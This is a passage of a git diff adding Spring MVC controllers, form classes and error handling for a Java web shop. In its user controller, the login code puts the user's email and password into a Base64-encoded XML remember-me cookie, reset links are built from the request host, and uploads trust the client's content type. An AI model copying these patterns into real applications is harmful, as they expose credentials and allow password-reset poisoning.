+            }
+        } catch (InstanceNotFoundException ex) {
+            return errorHandlingUtils.handleInstanceNotFoundException(ex, model, locale);
+        }
+        String message = messageSource.getMessage(Constants.ORDER_PAYMENT_COMPLETE_MESSAGE, new Object[0], locale);
+        redirectAttributes.addFlashAttribute(Constants.SUCCESS_MESSAGE, message);
+        redirectAttributes.addFlashAttribute(Constants.ORDER, order);
+        return Constants.SEND_REDIRECT + MessageFormat.format(Constants.ORDER_ENDPOINT_TEMPLATE, order.getOrderId());
+    }
+    
+    @PostMapping(Constants.ORDER_CANCEL_ENDPOINT)
+    public String doCancelOrder(@PathVariable() Long id, 
+                                @SessionAttribute(Constants.USER_SESSION) User user, 
+                                RedirectAttributes redirectAttributes,
+                                Locale locale, 
+                                Model model) throws InvalidStateException {
+        Order order;
+        try {
+            order = orderService.cancel(user, id);
+        } catch (InstanceNotFoundException ex) {
+            return errorHandlingUtils.handleInstanceNotFoundException(ex, model, locale);
+        }
+        String message = messageSource.getMessage(Constants.ORDER_CANCEL_COMPLETE_MESSAGE, new Object[0], locale);
+        redirectAttributes.addFlashAttribute(Constants.SUCCESS_MESSAGE, message);
+        redirectAttributes.addFlashAttribute(Constants.ORDER, order);
+        return Constants.SEND_REDIRECT + MessageFormat.format(Constants.ORDER_ENDPOINT_TEMPLATE, order.getOrderId());
+    }
+    
+}
diff --git a/src/main/java/es/storeapp/web/controller/ProductController.java b/src/main/java/es/storeapp/web/controller/ProductController.java
new file mode 100644
index 0000000..fc4e3f0
--- /dev/null
+++ b/src/main/java/es/storeapp/web/controller/ProductController.java
@@ -0,0 +1,70 @@
+package es.storeapp.web.controller;
+
+import es.storeapp.business.entities.Category;
+import es.storeapp.business.entities.Product;
+import es.storeapp.business.entities.User;
+import es.storeapp.business.exceptions.InstanceNotFoundException;
+import es.storeapp.business.services.OrderService;
+import es.storeapp.business.services.ProductService;
+import es.storeapp.common.Constants;
+import es.storeapp.web.exceptions.ErrorHandlingUtils;
+import es.storeapp.web.forms.ProductSearchForm;
+import java.util.List;
+import java.util.Locale;
+import es.storeapp.common.EscapingLoggerWrapper;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.stereotype.Controller;
+import org.springframework.ui.Model;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.ModelAttribute;
+import org.springframework.web.bind.annotation.PathVariable;
+import org.springframework.web.bind.annotation.SessionAttribute;
+
+@Controller
+public class ProductController {
+        
+    private static final EscapingLoggerWrapper logger = new EscapingLoggerWrapper(ProductController.class);
+    
+    @Autowired
+    private ProductService productService;
+    
+    @Autowired
+    private OrderService orderService;
+    
+    @Autowired
+    ErrorHandlingUtils errorHandlingUtils;
+    
+    @GetMapping(value = {Constants.PRODUCTS_ENDPOINT})
+    public String doGetProductsPage(@ModelAttribute ProductSearchForm searchForm, Model model) {
+        List<Product> products = productService.findProducts(searchForm.getCategory());
+        List<Category> categories = productService.findAllCategories();
+        model.addAttribute(Constants.PRODUCTS, products);
+        model.addAttribute(Constants.CATEGORIES, categories);
+        return Constants.PRODUCTS_PAGE;
+    }
+    
+    @GetMapping(value = {Constants.PRODUCT_ENDPOINT})
+    public String doGetProductPage(@PathVariable() Long id, 
+                                   @SessionAttribute(value= Constants.USER_SESSION, required = false) User user,
+                                   Model model, 
+                                   Locale locale) {
+        Product product;
+        try {
+            product = productService.findProductById(id);
+            model.addAttribute(Constants.PRODUCT, product);
+            if(user != null) {
+                model.addAttribute(Constants.BUY_BY_USER, orderService.findIfUserBuyProduct(user.getUserId(), id));
+            } else {
+                model.addAttribute(Constants.BUY_BY_USER, false);
+            }
+        } catch (InstanceNotFoundException ex) {
+            if(logger.isErrorEnabled()) {
+                logger.error(ex.getMessage(), ex);
+            }
+            return errorHandlingUtils.handleInstanceNotFoundException(ex, model, locale);
+        }
+        
+        return Constants.PRODUCT_PAGE;
+    }
+   
+}
diff --git a/src/main/java/es/storeapp/web/controller/ShoppingCartController.java b/src/main/java/es/storeapp/web/controller/ShoppingCartController.java
new file mode 100644
index 0000000..c46aae6
--- /dev/null
+++ b/src/main/java/es/storeapp/web/controller/ShoppingCartController.java
@@ -0,0 +1,105 @@
+package es.storeapp.web.controller;
+
+import es.storeapp.business.entities.Product;
+import es.storeapp.business.exceptions.InstanceNotFoundException;
+import es.storeapp.business.services.ProductService;
+import es.storeapp.common.Constants;
+import es.storeapp.web.exceptions.ErrorHandlingUtils;
+import es.storeapp.web.session.ShoppingCart;
+import java.text.MessageFormat;
+import java.util.List;
+import java.util.Locale;
+import es.storeapp.common.EscapingLoggerWrapper;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.context.MessageSource;
+import org.springframework.stereotype.Controller;
+import org.springframework.ui.Model;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.PathVariable;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.SessionAttribute;
+import org.springframework.web.servlet.mvc.support.RedirectAttributes;
+
+@Controller
+public class ShoppingCartController {
+
+    private static final EscapingLoggerWrapper logger = new EscapingLoggerWrapper(ShoppingCartController.class);
+    
+    @Autowired
+    private ProductService productService;
+
+    @Autowired
+    private MessageSource messageSource;
+
+    @Autowired
+    ErrorHandlingUtils exceptionHandlingUtils;
+    
+    @GetMapping(value = {Constants.CART_ENDPOINT})
+    public String doGetCartPage(@SessionAttribute(Constants.SHOPPING_CART_SESSION) ShoppingCart shoppingCart, 
+                                Model model, 
+                                Locale locale) {
+        return Constants.SHOPPING_CART_PAGE;
+    }
+    
+    @PostMapping(value = {Constants.CART_ADD_PRODUCT_ENDPOINT})
+    public String doAddProductToCart(@PathVariable() Long id, 
+                                     @SessionAttribute(Constants.SHOPPING_CART_SESSION) ShoppingCart shoppingCart,
+                                     RedirectAttributes redirectAttributes,
+                                     Model model, 
+                                     Locale locale) {
+        Product product;
+        try {
+            product = productService.findProductById(id);
+            List<Product> products = shoppingCart.getProducts();
+            if(logger.isDebugEnabled()) {
+                logger.debug(MessageFormat.format("Adding product {0} to shopping cart", id));
+            }
+            for (Product p : products) {
+                if (p.getProductId().equals(id)) {
+                    String message = messageSource.getMessage(Constants.PRODUCT_ALREADY_IN_SHOPPING_CART,
+                        new Object[]{p.getName()}, locale);
+                    redirectAttributes.addFlashAttribute(Constants.ERROR_MESSAGE, message);
+                    return Constants.SEND_REDIRECT + Constants.CART_ENDPOINT;
+                }
+            }
+            String message = messageSource.getMessage(Constants.PRODUCT_ADDED_TO_THE_SHOPPING_CART,
+                new Object[]{product.getName()}, locale);
+            redirectAttributes.addFlashAttribute(Constants.SUCCESS_MESSAGE, message);
+            products.add(product);
+        } catch (InstanceNotFoundException ex) {
+            return exceptionHandlingUtils.handleInstanceNotFoundException(ex, model, locale);
+        }
+
+        return Constants.SEND_REDIRECT + Constants.CART_ENDPOINT;
+    }
+
+    @PostMapping(value = {Constants.CART_REMOVE_PRODUCT_ENDPOINT})
+    public String doRemoveProductFromCart(@PathVariable() Long id,
+                                          @SessionAttribute(Constants.SHOPPING_CART_SESSION) ShoppingCart shoppingCart,
+                                          RedirectAttributes redirectAttributes,
+                                          Model model, 
+                                          Locale locale ) {
+        Product product;
+        try {
+            product = productService.findProductById(id);
+            List<Product> products = shoppingCart.getProducts();
+            for (Product p : products) {
+                if (p.getProductId().equals(id)) {
+                    String message = messageSource.getMessage(Constants.PRODUCT_REMOVED_FROM_THE_SHOPPING_CART,
+                        new Object[]{product.getName()}, locale);
+                    redirectAttributes.addFlashAttribute(Constants.SUCCESS_MESSAGE, message);
+                    products.remove(p);
+                    return Constants.SEND_REDIRECT + Constants.CART_ENDPOINT;
+                }
+            }
+            String message = messageSource.getMessage(Constants.PRODUCT_NOT_IN_SHOPPING_CART,
+                new Object[]{product.getName()}, locale);
+            redirectAttributes.addFlashAttribute(Constants.ERROR_MESSAGE, message);
+        } catch (InstanceNotFoundException ex) {
+            return exceptionHandlingUtils.handleInstanceNotFoundException(ex, model, locale);
+        }
+
+        return Constants.SEND_REDIRECT + Constants.CART_ENDPOINT;
+    }
+    
+}
diff --git a/src/main/java/es/storeapp/web/controller/UserController.java b/src/main/java/es/storeapp/web/controller/UserController.java
new file mode 100644
index 0000000..ee79e3b
--- /dev/null
+++ b/src/main/java/es/storeapp/web/controller/UserController.java
@@ -0,0 +1,398 @@
+package es.storeapp.web.controller;
+
+import es.storeapp.business.entities.User;
+import es.storeapp.business.exceptions.AuthenticationException;
+import es.storeapp.business.exceptions.DuplicatedResourceException;
+import es.storeapp.business.exceptions.InstanceNotFoundException;
+import es.storeapp.business.exceptions.ServiceException;
+import es.storeapp.business.services.UserService;
+import es.storeapp.common.Constants;
+import es.storeapp.web.cookies.UserInfo;
+import es.storeapp.web.exceptions.ErrorHandlingUtils;
+import es.storeapp.web.forms.LoginForm;
+import es.storeapp.web.forms.ChangePasswordForm;
+import es.storeapp.web.forms.ResetPasswordForm;
+import es.storeapp.web.forms.UserProfileForm;
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.text.MessageFormat;
+import java.util.Base64;
+import java.util.Locale;
+
+import javax.xml.bind.JAXBContext;
+import javax.xml.bind.JAXBException;
+import javax.xml.bind.Marshaller;
+
+import jakarta.servlet.http.Cookie;
+import jakarta.servlet.http.HttpServletRequest;
+import jakarta.servlet.http.HttpServletResponse;
+import jakarta.servlet.http.HttpSession;
+import jakarta.validation.Valid;
+import es.storeapp.common.EscapingLoggerWrapper;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.context.MessageSource;
+import org.springframework.http.HttpStatus;
+import org.springframework.http.MediaType;
+import org.springframework.http.ResponseEntity;
+import org.springframework.stereotype.Controller;
+import org.springframework.ui.Model;
+import org.springframework.validation.BindingResult;
+import org.springframework.web.bind.annotation.CookieValue;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.ModelAttribute;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.bind.annotation.SessionAttribute;
+import org.springframework.web.multipart.MultipartFile;
+import org.springframework.web.servlet.mvc.support.RedirectAttributes;
+
+@Controller
+public class UserController {
+
+    private static final EscapingLoggerWrapper logger = new EscapingLoggerWrapper(UserController.class);
+
+    @Autowired
+    private MessageSource messageSource;
+
+    @Autowired
+    private UserService userService;
+    
+    @Autowired
+    ErrorHandlingUtils errorHandlingUtils;
+    
+    @GetMapping(Constants.LOGIN_ENDPOINT)
+    public String doGetLoginPage(Model model) {
+        model.addAttribute(Constants.LOGIN_FORM, new LoginForm());
+        return Constants.LOGIN_PAGE;
+    }
+
+    @GetMapping(Constants.LOGOUT_ENDPOINT)
+    public String doLogout(HttpSession session, 
+                           HttpServletResponse response,
+                           @CookieValue(value = Constants.PERSISTENT_USER_COOKIE, required = false) String userInfo) {
+        if (userInfo != null) {
+            Cookie userCookie = new Cookie(Constants.PERSISTENT_USER_COOKIE, null);
+            userCookie.setHttpOnly(true);
+            userCookie.setSecure(true);
+            userCookie.setMaxAge(0); // remove
+            response.addCookie(userCookie);
+        }
+        if (session != null) {
+            session.invalidate();
+        }
+        return Constants.SEND_REDIRECT + Constants.ROOT_ENDPOINT;
+    }
+
+    @GetMapping(Constants.REGISTRATION_ENDPOINT)
+    public String doGetRegisterPage(Model model) {
+        model.addAttribute(Constants.USER_PROFILE_FORM, new UserProfileForm());
+        return Constants.USER_PROFILE_PAGE;
+    }
+
+    @GetMapping(Constants.USER_PROFILE_ENDPOINT)
+    public String doGetProfilePage(@SessionAttribute(Constants.USER_SESSION) User user,
+                                   Model model) {
+        UserProfileForm form = new UserProfileForm(user.getName(),
+                user.getEmail(), user.getAddress());
+        model.addAttribute(Constants.USER_PROFILE_FORM, form);
+        return Constants.USER_PROFILE_PAGE;
+    }
+
+    @GetMapping(Constants.CHANGE_PASSWORD_ENDPOINT)
+    public String doGetChangePasswordPage(Model model, @SessionAttribute(Constants.USER_SESSION) User user) {
+        ChangePasswordForm form = new ChangePasswordForm();
+        model.addAttribute(Constants.PASSWORD_FORM, form);
+        return Constants.PASSWORD_PAGE;
+    }
+
+    @GetMapping(Constants.SEND_EMAIL_ENDPOINT)
+    public String doGetSendEmailPage(Model model) {
+        return Constants.SEND_EMAIL_PAGE;
+    }
+
+    @GetMapping(Constants.RESET_PASSWORD_ENDPOINT)
+    public String doGetResetPasswordPage(@RequestParam(value = Constants.TOKEN_PARAM) String token,
+                                         @RequestParam(value = Constants.EMAIL_PARAM) String email,
+                                         Model model) {
+        ResetPasswordForm form = new ResetPasswordForm();
+        form.setEmail(email);
+        form.setToken(token);
+        model.addAttribute(Constants.RESET_PASSWORD_FORM, form);
+        return Constants.RESET_PASSWORD_PAGE;
+    }
+    
+    @PostMapping(Constants.LOGIN_ENDPOINT)
+    public String doLogin(@Valid @ModelAttribute LoginForm loginForm, 
+                          BindingResult result,
+                          HttpSession session,
+                          HttpServletResponse response,
+                          Locale locale, 
+                          Model model) throws JAXBException {
+        if (result.hasErrors()) {  
+            errorHandlingUtils.handleInvalidFormError(result, 
+                Constants.REGISTRATION_INVALID_PARAMS_MESSAGE, model, locale);
+            return Constants.USER_PROFILE_PAGE;
+        }
+        User user;
+        try {
+            user = userService.login(loginForm.getEmail(), loginForm.getPassword());
+            session.setAttribute(Constants.USER_SESSION, user);
+            if(logger.isDebugEnabled()) {
+                logger.debug(MessageFormat.format("User {0} logged in", user.getEmail()));
+            }
+            if (loginForm.getRememberMe() != null && loginForm.getRememberMe()) {
+                Base64.Encoder encoder = Base64.getEncoder();
+                ByteArrayOutputStream buffer = new ByteArrayOutputStream();
+                UserInfo userInfo = new UserInfo(user.getEmail(), user.getPassword());
+                JAXBContext context = JAXBContext.newInstance(UserInfo.class);
+                Marshaller marshaller = context.createMarshaller();
+                marshaller.setProperty(Marshaller.JAXB_FORMATTED_OUTPUT, true);
+                marshaller.setProperty(Marshaller.JAXB_FRAGMENT, false);
+                marshaller.marshal(userInfo, buffer);
+                Cookie userCookie = new Cookie(Constants.PERSISTENT_USER_COOKIE,
+                        new String(encoder.encode(buffer.toByteArray())));
+                userCookie.setMaxAge(604800); // 1 week
+                userCookie.setHttpOnly(true);
+                userCookie.setSecure(true);
+                response.addCookie(userCookie);
+            }
+        } catch (AuthenticationException ex) {
+            if(logger.isDebugEnabled()) {
+                logger.debug(MessageFormat.format("User {0} not logged in ", loginForm.getEmail()));
+            }
+            return errorHandlingUtils.handleAuthenticationException(ex, loginForm.getEmail(), 
+                    Constants.LOGIN_PAGE, model, locale);
+        }
+        return Constants.SEND_REDIRECT + Constants.ROOT_ENDPOINT;
+    }
+
+    @PostMapping(Constants.REGISTRATION_ENDPOINT)
+    public String doRegister(@Valid @ModelAttribute(Constants.USER_PROFILE_FORM) UserProfileForm userProfileForm,
+                             BindingResult result,
+                             RedirectAttributes redirectAttributes,
+                             HttpSession session,
+                             Locale locale, 
+                             Model model) {
+        if (result.hasErrors()) {
+            errorHandlingUtils.handleInvalidFormError(result, 
+                Constants.REGISTRATION_INVALID_PARAMS_MESSAGE, model, locale);
+            return Constants.USER_PROFILE_PAGE;
+        }
+        User user;
+        try {
+            if(userProfileForm.getImage() == null){
+                user = userService.create(userProfileForm.getName(), userProfileForm.getEmail(),
+                        userProfileForm.getPassword(), userProfileForm.getAddress(), null, null);
+            }else{
+                MultipartFile file = userProfileForm.getImage();
+                String contentType = file.getContentType();
+                if(contentType != null && !contentType.contains("jpeg")){
+                    user = userService.create(userProfileForm.getName(), userProfileForm.getEmail(),
+                            userProfileForm.getPassword(), userProfileForm.getAddress(), null, null);
+                }else{
+                    user = userService.create(userProfileForm.getName(), userProfileForm.getEmail(),
+                            userProfileForm.getPassword(), userProfileForm.getAddress(), userProfileForm.getImage().getOriginalFilename(),
+                            userProfileForm.getImage().getBytes());
+                }
+            }
+            if(logger.isDebugEnabled()) {
+                logger.debug(MessageFormat.format("User {0} with name {1} registered", user.getEmail(), user.getName()));
+            }
+            session.setAttribute(Constants.USER_SESSION, user);
+            redirectAttributes.addFlashAttribute(Constants.SUCCESS_MESSAGE, messageSource.getMessage(
+                    Constants.REGISTRATION_SUCCESS_MESSAGE, new Object[]{user.getName()}, locale));
+        } catch (DuplicatedResourceException ex) {
+            return errorHandlingUtils.handleDuplicatedResourceException(ex, Constants.USER_PROFILE_PAGE,
+                    model, locale);
+        } catch (IOException ex) {
+            return errorHandlingUtils.handleUnexpectedException(ex, model);
+        }
+        return Constants.SEND_REDIRECT + Constants.ROOT_ENDPOINT;
+    }
+
+    @PostMapping(Constants.USER_PROFILE_ENDPOINT)
+    public String doUpdateProfile(@Valid @ModelAttribute(Constants.USER_PROFILE_FORM) UserProfileForm userProfileForm,
+                                  BindingResult result,
+                                  @SessionAttribute(Constants.USER_SESSION) User user,            
+                                  HttpSession session,
+                                  Locale locale, 
+                                  Model model) {
+        if (result.hasErrors()) {
+            errorHandlingUtils.handleInvalidFormError(result, 
+                Constants.UPDATE_PROFILE_INVALID_PARAMS_MESSAGE, model, locale);
+            return Constants.USER_PROFILE_PAGE;
+        }
+        User updatedUser;
+        try {
+            if(userProfileForm.getImage() == null){
+                updatedUser = userService.update(user.getUserId(), userProfileForm.getName(), userProfileForm.getEmail(),
+                    userProfileForm.getAddress(), null, null);
+            }else{
+                MultipartFile file = userProfileForm.getImage();
+                String contentType = file.getContentType();
+                if(contentType != null && !contentType.contains("jpeg")){
+                    updatedUser = userService.update(user.getUserId(), userProfileForm.getName(), userProfileForm.getEmail(),
+                        userProfileForm.getAddress(), null, null);
+                }else{
+                    updatedUser = userService.update(user.getUserId(), userProfileForm.getName(), userProfileForm.getEmail(),
+                    userProfileForm.getAddress(), userProfileForm.getImage().getOriginalFilename(), 
+                    userProfileForm.getImage().getBytes());
+                }
+            }
+            if(logger.isDebugEnabled()) {
+                logger.debug(MessageFormat.format("User {0} with name {1} updated", 
+                        updatedUser.getEmail(), updatedUser.getName()));
+            }
+            
+            session.setAttribute(Constants.USER_SESSION, updatedUser);
+            model.addAttribute(Constants.SUCCESS_MESSAGE, messageSource.getMessage(
+                Constants.PROFILE_UPDATE_SUCCESS, new Object[]{}, locale));
+            
+        } catch (InstanceNotFoundException ex) {
+            return errorHandlingUtils.handleInstanceNotFoundException(ex, model, locale);
+        } catch (DuplicatedResourceException ex) {
+            return errorHandlingUtils.handleDuplicatedResourceException(ex, Constants.ERROR_PAGE, model, locale);
+        } catch (Exception ex) {
+            return errorHandlingUtils.handleUnexpectedException(ex, model);
+        }
+        return Constants.USER_PROFILE_PAGE;
+    }
+
+    @PostMapping(Constants.CHANGE_PASSWORD_ENDPOINT)
+    public String doChangePassword(@Valid @ModelAttribute(Constants.PASSWORD_FORM) ChangePasswordForm passwordForm,
+                                   BindingResult result,
+                                   @SessionAttribute(Constants.USER_SESSION) User user,
+                                   HttpSession session,
+                                   RedirectAttributes redirectAttributes,
+                                   Locale locale, 
+                                   Model model) {
+        if (result.hasErrors()) {       
+            errorHandlingUtils.handleInvalidFormError(result, 
+                Constants.CHANGE_PASSWORD_INVALID_PARAMS_MESSAGE, model, locale);            
+            return Constants.PASSWORD_PAGE;
+        }
+        User updatedUser;
+        try {
+            updatedUser = userService.changePassword(user.getUserId(), passwordForm.getOldPassword(), passwordForm.getPassword());
+            session.setAttribute(Constants.USER_SESSION, updatedUser);
+            redirectAttributes.addFlashAttribute(Constants.SUCCESS_MESSAGE, messageSource.getMessage(
+                    Constants.PROFILE_UPDATE_SUCCESS, new Object[]{}, locale));
+        } catch (InstanceNotFoundException ex) {
+            return errorHandlingUtils.handleInstanceNotFoundException(ex, model, locale);
+        } catch (AuthenticationException ex) {
+            return errorHandlingUtils.handleAuthenticationException(ex, user.getEmail(), 
+                    Constants.PASSWORD_PAGE, model, locale);
+        }
+        return Constants.SEND_REDIRECT + Constants.ROOT_ENDPOINT;
+    }
+
+    @GetMapping(Constants.USER_PROFILE_IMAGE_ENDPOINT)
+    public ResponseEntity<byte[]> doGetProfileImage(@SessionAttribute(Constants.USER_SESSION) User user,
+                                                    HttpServletResponse response,
+                                                    Locale locale, 
+                                                    Model model) {
+        try {
+            
+            response.setHeader(Constants.CONTENT_TYPE_HEADER, MediaType.APPLICATION_OCTET_STREAM_VALUE);
+            response.setHeader(Constants.CONTENT_DISPOSITION_HEADER,
+                    MessageFormat.format(Constants.CONTENT_DISPOSITION_HEADER_VALUE, user.getEmail(), user.getImage()));
+            
+            byte[] contents = userService.getImage(user.getUserId());
+            if (contents == null) {
+                String message = messageSource.getMessage(Constants.INVALID_PROFILE_IMAGE_MESSAGE,
+                        new Object[]{}, locale);
+                model.addAttribute(Constants.MESSAGE, message);
+                return new ResponseEntity<>(new byte[0], null, HttpStatus.INTERNAL_SERVER_ERROR);
+            }
+
+            return new ResponseEntity<>(contents, null, HttpStatus.OK);
+        } catch (InstanceNotFoundException ex) {
+            errorHandlingUtils.handleInstanceNotFoundException(ex, model, locale);
+            return new ResponseEntity<>(new byte[0], null, HttpStatus.NOT_FOUND);
+        } catch (Exception ex) {
+            errorHandlingUtils.handleUnexpectedException(ex, model);
+            return new ResponseEntity<>(new byte[0], null, HttpStatus.INTERNAL_SERVER_ERROR);
+        }
+
+    }
+
+    @PostMapping(Constants.USER_PROFILE_IMAGE_REMOVE_ENDPOINT)
+    public String doRemoveProfileImage(@SessionAttribute(Constants.USER_SESSION) User user,
+                                       HttpSession session,
+                                       RedirectAttributes redirectAttributes,
+                                       Locale locale, 
+                                       Model model) {
+
+        User updatedUser;
+        try {
+            updatedUser = userService.removeImage(user.getUserId());
+            session.setAttribute(Constants.USER_SESSION, updatedUser);
+            redirectAttributes.addFlashAttribute(Constants.SUCCESS_MESSAGE, messageSource.getMessage(
+                    Constants.PROFILE_UPDATE_SUCCESS, new Object[]{}, locale));
+        } catch (InstanceNotFoundException ex) {
+            return errorHandlingUtils.handleInstanceNotFoundException(ex, model, locale);
+        } catch (ServiceException ex) {
+            return errorHandlingUtils.handleUnexpectedException(ex, model);
+        }
+        return Constants.SEND_REDIRECT + Constants.USER_PROFILE_ENDPOINT;
+    }
+
+    @PostMapping(Constants.SEND_EMAIL_ENDPOINT)
+    public String doSendEmail(@RequestParam(Constants.EMAIL_PARAM) String email,
+                              RedirectAttributes redirectAttributes,
+                              HttpServletRequest request,
+                              Locale locale, 
+                              Model model) {
+        try {
+            if(email == null || email.trim().length() == 0) {
+                String message = messageSource.getMessage(Constants.INVALID_EMAIL_MESSAGE, new Object[]{}, locale);
+                model.addAttribute(Constants.ERROR_MESSAGE, message);
+                return Constants.SEND_EMAIL_PAGE;
+            }
+            
+            String scheme = request.getScheme();
+            String serverName = request.getServerName();
+            Integer portNumber = request.getServerPort();
+            String contextPath = request.getContextPath();
+            
+            userService.sendResetPasswordEmail(email, MessageFormat.format(Constants.URL_FORMAT, scheme, 
+                    serverName, portNumber.toString(), contextPath, Constants.RESET_PASSWORD_ENDPOINT), locale);
+            
+            redirectAttributes.addFlashAttribute(Constants.SUCCESS_MESSAGE, messageSource.getMessage(
+                    Constants.MAIL_SUCCESS_MESSAGE, new Object[] { email }, locale));
+            
+        } catch (AuthenticationException ex) {
+            return errorHandlingUtils.handleAuthenticationException(ex, email, 
+                    Constants.SEND_EMAIL_PAGE, model, locale);
+        } catch (Exception ex) {
+            return errorHandlingUtils.handleUnexpectedException(ex, model);
+        }
+        return Constants.SEND_REDIRECT + Constants.SEND_EMAIL_ENDPOINT;
+    }
+    
+    @PostMapping(Constants.RESET_PASSWORD_ENDPOINT)
+    public String doResetPassword(@Valid @ModelAttribute(Constants.RESET_PASSWORD_FORM) ResetPasswordForm passwordForm,
+                                  BindingResult result,
+                                  RedirectAttributes redirectAttributes,
+                                  HttpServletRequest request,
+                                  Locale locale, 
+                                  Model model) {
+        try {
+            if (result.hasErrors()) {
+                errorHandlingUtils.handleInvalidFormError(result, 
+                    Constants.RESET_PASSWORD_INVALID_PARAMS_MESSAGE, model, locale);
+                return Constants.RESET_PASSWORD_PAGE;
+            }
+            userService.changePassword(passwordForm.getEmail(), passwordForm.getPassword(), passwordForm.getToken());
+            redirectAttributes.addFlashAttribute(Constants.SUCCESS_MESSAGE, messageSource.getMessage(
+                    Constants.CHANGE_PASSWORD_SUCCESS, new Object[0], locale));
+        } catch (AuthenticationException ex) {
+            return errorHandlingUtils.handleAuthenticationException(ex, passwordForm.getEmail(), 
+                    Constants.SEND_EMAIL_PAGE, model, locale);
+        } catch (Exception ex) {
+            return errorHandlingUtils.handleUnexpectedException(ex, model);
+        }
+        return Constants.SEND_REDIRECT + Constants.ROOT_ENDPOINT;
+    }
+
+}
diff --git a/src/main/java/es/storeapp/web/cookies/UserInfo.java b/src/main/java/es/storeapp/web/cookies/UserInfo.java
new file mode 100644
index 0000000..023a31f
--- /dev/null
+++ b/src/main/java/es/storeapp/web/cookies/UserInfo.java
@@ -0,0 +1,41 @@
+package es.storeapp.web.cookies;
+
+import javax.xml.bind.annotation.XmlAccessType;
+import javax.xml.bind.annotation.XmlAccessorType;
+import javax.xml.bind.annotation.XmlElement;
+import javax.xml.bind.annotation.XmlRootElement;
+
+@XmlRootElement(name="UserInfo")
+@XmlAccessorType(XmlAccessType.FIELD)
+public class UserInfo {
+
+    @XmlElement
+    private String email;
+    @XmlElement
+    private String password;
+
+    public UserInfo() {
+    }
+
+    public UserInfo(String email, String password) {
+        this.email = email;
+        this.password = password;
+    }
+    
+    public String getEmail() {
+        return email;
+    }
+
+    public void setEmail(String email) {
+        this.email = email;
+    }
+
+    public String getPassword() {
+        return password;
+    }
+
+    public void setPassword(String password) {
+        this.password = password;
+    }
+    
+}
diff --git a/src/main/java/es/storeapp/web/exceptions/ErrorHandlingUtils.java b/src/main/java/es/storeapp/web/exceptions/ErrorHandlingUtils.java
new file mode 100644
index 0000000..939127c
--- /dev/null
+++ b/src/main/java/es/storeapp/web/exceptions/ErrorHandlingUtils.java
@@ -0,0 +1,70 @@
+package es.storeapp.web.exceptions;
+
+import es.storeapp.business.exceptions.AuthenticationException;
+import es.storeapp.business.exceptions.DuplicatedResourceException;
+import es.storeapp.business.exceptions.InstanceNotFoundException;
+import es.storeapp.business.exceptions.InvalidStateException;
+import es.storeapp.common.Constants;
+import java.util.Locale;
+import es.storeapp.common.EscapingLoggerWrapper;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.context.MessageSource;
+import org.springframework.stereotype.Component;
+import org.springframework.ui.Model;
+import org.springframework.validation.BindingResult;
+
+@Component
+public class ErrorHandlingUtils {
+
+    private static final EscapingLoggerWrapper logger = new EscapingLoggerWrapper(ErrorHandlingUtils.class);
+
+    @Autowired
+    private MessageSource messageSource;
+    
+    public String handleInvalidFormError(BindingResult result, String template, 
+                                         Model model, Locale locale) {
+        if(logger.isErrorEnabled()) {
+            logger.error(result.toString());
+        }
+        String message = messageSource.getMessage(template, new Object[0], locale);
+        model.addAttribute(Constants.ERROR_MESSAGE, message);
+        return Constants.ERROR_PAGE;
+    }
+    
+    public String handleInstanceNotFoundException(InstanceNotFoundException e, Model model, Locale locale) {
+        logger.error(e.getMessage(), e);
+        model.addAttribute(Constants.ERROR_MESSAGE, e.getMessage());
+        model.addAttribute(Constants.EXCEPTION, e);
+        return Constants.ERROR_PAGE;
+    }
+    
+    public String handleDuplicatedResourceException(DuplicatedResourceException e, String targetPage,
+                                                    Model model, Locale locale) {
+        logger.error(e.getMessage(), e);
+        model.addAttribute(Constants.ERROR_MESSAGE, e.getMessage());
+        model.addAttribute(Constants.EXCEPTION, e);
+        return targetPage;
+    }
+
+    public String handleAuthenticationException(AuthenticationException e, String user, String targetPage,
+                                                Model model, Locale locale) {
+        logger.error(e.getMessage(), e);
+        model.addAttribute(Constants.ERROR_MESSAGE, e.getMessage());
+        model.addAttribute(Constants.EXCEPTION, e);
+        return targetPage;
+    }
+    
+    public String handleInvalidStateException(InvalidStateException e, Model model, Locale locale) {
+        logger.error(e.getMessage(), e);
+        model.addAttribute(Constants.ERROR_MESSAGE, e.getMessage());
+        model.addAttribute(Constants.EXCEPTION, e);
+        return Constants.ERROR_PAGE;
+    }
+    
+    public String handleUnexpectedException(Exception e, Model model) {
+        logger.error(e.getMessage(), e);
+        model.addAttribute(Constants.ERROR_MESSAGE, e.getMessage());
+        model.addAttribute(Constants.EXCEPTION, e);
+        return Constants.ERROR_PAGE;
+    }
+}
diff --git a/src/main/java/es/storeapp/web/forms/ChangePasswordForm.java b/src/main/java/es/storeapp/web/forms/ChangePasswordForm.java
new file mode 100644
index 0000000..e553a17
--- /dev/null
+++ b/src/main/java/es/storeapp/web/forms/ChangePasswordForm.java
@@ -0,0 +1,24 @@
+package es.storeapp.web.forms;
+
+public class ChangePasswordForm {
+    
+    private String oldPassword;
+    private String password;
+
+    public String getOldPassword() {
+        return oldPassword;
+    }
+
+    public void setOldPassword(String oldPassword) {
+        this.oldPassword = oldPassword;
+    }
+
+    public String getPassword() {
+        return password;
+    }
+
+    public void setPassword(String password) {
+        this.password = password;
+    }
+
+}
diff --git a/src/main/java/es/storeapp/web/forms/CommentForm.java b/src/main/java/es/storeapp/web/forms/CommentForm.java
new file mode 100644
index 0000000..b40897f
--- /dev/null
+++ b/src/main/java/es/storeapp/web/forms/CommentForm.java
@@ -0,0 +1,34 @@
+package es.storeapp.web.forms;
+
+public class CommentForm {
+    
+    private Long productId;
+    private String text;
+    private Integer rating;
+
+    public String getText() {
+        return text;
+    }
+
+    public void setText(String text) {
+        this.text = text;
+    }
+
+    public Integer getRating() {
+        return rating;
+    }
+
+    public void setRating(Integer rating) {
+        this.rating = rating;
+    }
+
+    public Long getProductId() {
+        return productId;
+    }
+
+    public void setProductId(Long productId) {
+        this.productId = productId;
+    }
+
+    
+}
